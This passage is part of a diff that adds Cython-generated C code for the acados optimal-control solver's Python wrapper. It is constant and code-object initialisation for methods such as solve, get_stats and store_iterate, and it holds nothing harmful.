__Pyx_GOTREF(__pyx_tuple__4); + __Pyx_INCREF(__pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_int_neg_1); + PyTuple_SET_ITEM(__pyx_tuple__4, 0, __pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_tuple__4); + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_slice__5 = PySlice_New(Py_None, Py_None, Py_None); if (unlikely(!__pyx_slice__5)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_tuple__8 = PyTuple_Pack(3, __pyx_int_136983863, __pyx_int_112105877, __pyx_int_184977713); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__8); + __Pyx_GIVEREF(__pyx_tuple__8); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_tuple__9 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_multiarray_failed_to); if (unlikely(!__pyx_tuple__9)) __PYX_ERR(2, 986, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__9); + __Pyx_GIVEREF(__pyx_tuple__9); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_tuple__10 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_umath_failed_to_impor); if (unlikely(!__pyx_tuple__10)) __PYX_ERR(2, 992, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__10); + __Pyx_GIVEREF(__pyx_tuple__10); + + /* "acados_template/acados_ocp_solver_pyx.pyx":134 + * """ + * + * raise NotImplementedError("AcadosOcpSolverCython: does not support set_new_time_steps() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * # # unlikely but still possible + * # if not self.solver_created: + */ + __pyx_tuple__11 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_does_not_s); if (unlikely(!__pyx_tuple__11)) __PYX_ERR(0, 134, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__11); + __Pyx_GIVEREF(__pyx_tuple__11); + + /* "acados_template/acados_ocp_solver_pyx.pyx":186 + * `qp_solver_cond_N < N`. + * """ + * raise NotImplementedError("AcadosOcpSolverCython: does not support update_qp_solver_cond_N() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * + * # # unlikely but still possible + */ + __pyx_tuple__12 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_does_not_s_2); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__12); + __Pyx_GIVEREF(__pyx_tuple__12); + + /* "acados_template/acados_ocp_solver_pyx.pyx":219 + * # checks + * if not isinstance(index, int): + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') # <<<<<<<<<<<<<< + * + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + */ + __pyx_tuple__13 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_eval_param); if (unlikely(!__pyx_tuple__13)) __PYX_ERR(0, 219, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__13); + __Pyx_GIVEREF(__pyx_tuple__13); + + /* "acados_template/acados_ocp_solver_pyx.pyx":307 + * # append timestamp + * if os.path.isfile(filename): + * filename = filename[:-5] # <<<<<<<<<<<<<< + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + * + */ + __pyx_slice__16 = PySlice_New(Py_None, __pyx_int_neg_5, Py_None); if (unlikely(!__pyx_slice__16)) __PYX_ERR(0, 307, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__16); + __Pyx_GIVEREF(__pyx_slice__16); + + /* "acados_template/acados_ocp_solver_pyx.pyx":325 + * + * # save + * with open(filename, 'w') as f: # <<<<<<<<<<<<<< + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + */ + __pyx_tuple__17 = PyTuple_Pack(3, Py_None, Py_None, Py_None); if (unlikely(!__pyx_tuple__17)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__17); + __Pyx_GIVEREF(__pyx_tuple__17); + + /* "acados_template/acados_ocp_solver_pyx.pyx":410 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] # <<<<<<<<<<<<<< + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] + */ + __pyx_tuple__18 = PyTuple_Pack(2, __pyx_int_6, __pyx_slice__5); if (unlikely(!__pyx_tuple__18)) __PYX_ERR(0, 410, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__18); + __Pyx_GIVEREF(__pyx_tuple__18); + + /* "acados_template/acados_ocp_solver_pyx.pyx":412 + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] # <<<<<<<<<<<<<< + * + * elif field_ == 'alpha': + */ + __pyx_tuple__19 = PyTuple_Pack(2, __pyx_int_2, __pyx_slice__5); if (unlikely(!__pyx_tuple__19)) __PYX_ERR(0, 412, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__19); + __Pyx_GIVEREF(__pyx_tuple__19); + + /* "acados_template/acados_ocp_solver_pyx.pyx":417 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[7, :] # <<<<<<<<<<<<<< + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") + */ + __pyx_tuple__20 = PyTuple_Pack(2, __pyx_int_7, __pyx_slice__5); if (unlikely(!__pyx_tuple__20)) __PYX_ERR(0, 417, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__20); + __Pyx_GIVEREF(__pyx_tuple__20); + + /* "acados_template/acados_ocp_solver_pyx.pyx":419 + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") # <<<<<<<<<<<<<< + * + * elif field_ == 'residuals': + */ + __pyx_tuple__21 = PyTuple_Pack(1, __pyx_kp_u_alpha_values_are_not_available_f); if (unlikely(!__pyx_tuple__21)) __PYX_ERR(0, 419, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__21); + __Pyx_GIVEREF(__pyx_tuple__21); + + /* "acados_template/acados_ocp_solver_pyx.pyx":425 + * + * else: + * raise NotImplementedError("TODO!") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__22 = PyTuple_Pack(1, __pyx_kp_u_TODO); if (unlikely(!__pyx_tuple__22)) __PYX_ERR(0, 425, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__22); + __Pyx_GIVEREF(__pyx_tuple__22); + + /* "acados_template/acados_ocp_solver_pyx.pyx":434 + * + * def __get_stat_double(self, field): + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + * return out + */ + __pyx_tuple__23 = PyTuple_Pack(1, __pyx_int_1); if (unlikely(!__pyx_tuple__23)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__23); + __Pyx_GIVEREF(__pyx_tuple__23); + + /* "acados_template/acados_ocp_solver_pyx.pyx":469 + * + * # create output array + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.ascontiguousarray(np.zeros((4,), dtype=np.float64)) # <<<<<<<<<<<<<< + * cdef double double_value + * + */ + __pyx_tuple__24 = PyTuple_Pack(1, __pyx_int_4); if (unlikely(!__pyx_tuple__24)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__24); + __Pyx_GIVEREF(__pyx_tuple__24); + __pyx_tuple__25 = PyTuple_Pack(1, __pyx_tuple__24); if (unlikely(!__pyx_tuple__25)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__25); + __Pyx_GIVEREF(__pyx_tuple__25); + + /* "acados_template/acados_ocp_solver_pyx.pyx":570 + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) # <<<<<<<<<<<<<< + * + * elif len(value_shape) == 2: + */ + __pyx_tuple__26 = PyTuple_Pack(2, Py_None, __pyx_slice__5); if (unlikely(!__pyx_tuple__26)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__26); + __Pyx_GIVEREF(__pyx_tuple__26); + + /* "acados_template/acados_ocp_solver_pyx.pyx":676 + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + */ + __pyx_tuple__27 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_solve_argu); if (unlikely(!__pyx_tuple__27)) __PYX_ERR(0, 676, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__27); + __Pyx_GIVEREF(__pyx_tuple__27); + + /* "acados_template/acados_ocp_solver_pyx.pyx":679 + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only value 0 for SQP-type solvers') + * + */ + __pyx_tuple__28 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_solve_argu_2); if (unlikely(!__pyx_tuple__28)) __PYX_ERR(0, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__28); + __Pyx_GIVEREF(__pyx_tuple__28); + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_tuple__30 = PyTuple_Pack(1, __pyx_n_s_sys); if (unlikely(!__pyx_tuple__30)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__30); + __Pyx_GIVEREF(__pyx_tuple__30); + __pyx_tuple__31 = PyTuple_Pack(2, __pyx_int_3, __pyx_int_3); if (unlikely(!__pyx_tuple__31)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__31); + __Pyx_GIVEREF(__pyx_tuple__31); + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_tuple__32 = PyTuple_Pack(1, __pyx_kp_s_collections_abc); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(1, 101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__32); + __Pyx_GIVEREF(__pyx_tuple__32); + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + __pyx_tuple__33 = PyTuple_Pack(1, __pyx_n_s_collections); if (unlikely(!__pyx_tuple__33)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__33); + __Pyx_GIVEREF(__pyx_tuple__33); + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_tuple__34 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct_or_indirect); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__34); + __Pyx_GIVEREF(__pyx_tuple__34); + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_tuple__35 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct); if (unlikely(!__pyx_tuple__35)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__35); + __Pyx_GIVEREF(__pyx_tuple__35); + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__36 = PyTuple_Pack(1, __pyx_kp_s_strided_and_indirect); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__36); + __Pyx_GIVEREF(__pyx_tuple__36); + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_tuple__37 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_direct); if (unlikely(!__pyx_tuple__37)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__37); + __Pyx_GIVEREF(__pyx_tuple__37); + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__38 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_indirect); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_tuple__39 = PyTuple_Pack(5, __pyx_n_s_pyx_type, __pyx_n_s_pyx_checksum, __pyx_n_s_pyx_state, __pyx_n_s_pyx_PickleError, __pyx_n_s_pyx_result); if (unlikely(!__pyx_tuple__39)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__39); + __Pyx_GIVEREF(__pyx_tuple__39); + __pyx_codeobj__40 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__39, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle_Enum, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__40)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + __pyx_tuple__41 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__41)) __PYX_ERR(0, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__41); + __Pyx_GIVEREF(__pyx_tuple__41); + __pyx_codeobj__42 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_pointers_solver, 94, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__42)) __PYX_ERR(0, 94, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + __pyx_codeobj__43 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_solve, 108, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__43)) __PYX_ERR(0, 108, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + __pyx_codeobj__44 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_reset, 115, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__44)) __PYX_ERR(0, 115, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + __pyx_tuple__45 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_new_time_steps); if (unlikely(!__pyx_tuple__45)) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__45); + __Pyx_GIVEREF(__pyx_tuple__45); + __pyx_codeobj__46 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__45, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_set_new_time_steps, 122, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__46)) __PYX_ERR(0, 122, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + __pyx_tuple__47 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_qp_solver_cond_N); if (unlikely(!__pyx_tuple__47)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__47); + __Pyx_GIVEREF(__pyx_tuple__47); + __pyx_codeobj__48 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__47, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_update_qp_solver_cond_N, 173, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__48)) __PYX_ERR(0, 173, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + __pyx_tuple__49 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_index, __pyx_n_s_stage, __pyx_n_s_field, __pyx_n_s_field_2, __pyx_n_s_nx); if (unlikely(!__pyx_tuple__49)) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__49); + __Pyx_GIVEREF(__pyx_tuple__49); + __pyx_codeobj__50 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__49, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_eval_param_sens, 207, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__50)) __PYX_ERR(0, 207, __pyx_L1_error) + __pyx_tuple__51 = PyTuple_Pack(2, __pyx_int_0, __pyx_n_u_ex); if (unlikely(!__pyx_tuple__51)) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__51); + __Pyx_GIVEREF(__pyx_tuple__51); + + /* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + __pyx_tuple__52 = PyTuple_Pack(7, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_out_fields, __pyx_n_s_field, __pyx_n_s_dims, __pyx_n_s_out); if (unlikely(!__pyx_tuple__52)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__52); + __Pyx_GIVEREF(__pyx_tuple__52); + __pyx_codeobj__53 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__52, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get, 232, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__53)) __PYX_ERR(0, 232, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + __pyx_codeobj__54 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_print_statistics, 275, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__54)) __PYX_ERR(0, 275, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + __pyx_tuple__55 = PyTuple_Pack(7, __pyx_n_s_self, __pyx_n_s_filename, __pyx_n_s_overwrite, __pyx_n_s_json, __pyx_n_s_solution, __pyx_n_s_i, __pyx_n_s_f); if (unlikely(!__pyx_tuple__55)) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__55); + __Pyx_GIVEREF(__pyx_tuple__55); + __pyx_codeobj__56 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__55, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_store_iterate, 293, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__56)) __PYX_ERR(0, 293, __pyx_L1_error) + __pyx_tuple__57 = PyTuple_Pack(2, __pyx_kp_u__14, Py_False); if (unlikely(!__pyx_tuple__57)) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__57); + __Pyx_GIVEREF(__pyx_tuple__57); + + /* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + __pyx_tuple__58 = PyTuple_Pack(8, __pyx_n_s_self, __pyx_n_s_filename, __pyx_n_s_json, __pyx_n_s_f, __pyx_n_s_solution, __pyx_n_s_key, __pyx_n_s_field, __pyx_n_s_stage); if (unlikely(!__pyx_tuple__58)) __PYX_ERR(0, 330, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__58); + __Pyx_GIVEREF(__pyx_tuple__58); + __pyx_codeobj__59 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__58, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_load_iterate, 330, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__59)) __PYX_ERR(0, 330, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + __pyx_tuple__60 = PyTuple_Pack(10, __pyx_n_s_self, __pyx_n_s_field_2, __pyx_n_s_double_fields, __pyx_n_s_fields, __pyx_n_s_field, __pyx_n_s_sqp_iter, __pyx_n_s_stat_m, __pyx_n_s_stat_n, __pyx_n_s_min_size, __pyx_n_s_full_stats); if (unlikely(!__pyx_tuple__60)) __PYX_ERR(0, 346, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__60); + __Pyx_GIVEREF(__pyx_tuple__60); + __pyx_codeobj__61 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__60, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stats, 346, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__61)) __PYX_ERR(0, 346, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + __pyx_tuple__62 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_field, __pyx_n_s_out); if (unlikely(!__pyx_tuple__62)) __PYX_ERR(0, 428, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__62); + __Pyx_GIVEREF(__pyx_tuple__62); + __pyx_codeobj__63 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__62, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stat_int, 428, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__63)) __PYX_ERR(0, 428, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + __pyx_codeobj__64 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__62, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stat_double, 433, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__64)) __PYX_ERR(0, 433, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + __pyx_tuple__65 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_field, __pyx_n_s_n, __pyx_n_s_m, __pyx_n_s_out_mat); if (unlikely(!__pyx_tuple__65)) __PYX_ERR(0, 438, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__65); + __Pyx_GIVEREF(__pyx_tuple__65); + __pyx_codeobj__66 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__65, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stat_matrix, 438, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__66)) __PYX_ERR(0, 438, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # 